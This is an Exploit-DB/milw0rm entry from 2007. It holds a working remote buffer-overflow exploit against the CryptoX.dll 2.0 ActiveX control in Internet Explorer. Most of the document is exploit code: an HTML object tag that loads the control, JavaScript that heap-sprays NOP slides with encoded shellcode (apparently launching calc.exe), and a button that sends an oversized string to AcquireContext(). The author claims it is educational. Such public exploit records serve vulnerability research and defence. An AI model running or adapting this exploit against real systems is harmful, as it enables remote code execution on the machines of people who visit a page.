Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow

EDB-ID:

4389


Author:

shinnai

Type:

remote


Platform:

Windows

Date:

2007-09-10


<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------------
 <b>Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit</b>
 url: http://www.ultrashareware.com/

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 Heap Spray Technique was developed by SkyLined
 (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)

 <b>The "DeleteContext()" is vulnerable too</b>
-----------------------------------------------------------------------------------
<object id=boom classid="clsid:09C282FE-7DE7-4697-9BE2-1C4F4DA825B3" style="WIDTH: 578px; HEIGHT: 228px"></object>
<input language=JavaScript onclick=tryMe() type=button value="Launch Exploit">
<script>
 var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                           "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                           "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                           "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                           "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                           "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                           "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                           "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                           "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                           "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                           "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                           "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                           "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                           "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                           "%u652E%u6578%u9000");

 var spraySlide = unescape("%u9090%u9090");
 var heapSprayToAddress = 0x0c0c0c0c;

  function tryMe()
   {
    var size_buff = 3200;
    var x =  unescape("%0c%0c%0c%0c");
    while (x.length<size_buff) x += x;
    x = x.substring(0,size_buff);

    boom.AcquireContext(x,1,1);
   }
    
  function getSpraySlide(spraySlide, spraySlideSize)
   {
    while (spraySlide.length*2<spraySlideSize)
     {
      spraySlide += spraySlide;
     }
    spraySlide = spraySlide.substring(0,spraySlideSize/2);
    return (spraySlide);
   }

 var heapBlockSize = 0x100000;
 var SizeOfHeapDataMoreover = 0x5;
 var payLoadSize = (shellcode.length * 2);

 var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
 var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;

 var memory = new Array();
 spraySlide = getSpraySlide(spraySlide,spraySlideSize);

 for (i=0;i<heapBlocks;i++)
  {
    memory[i] = spraySlide +  shellcode;
  }
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-09-10]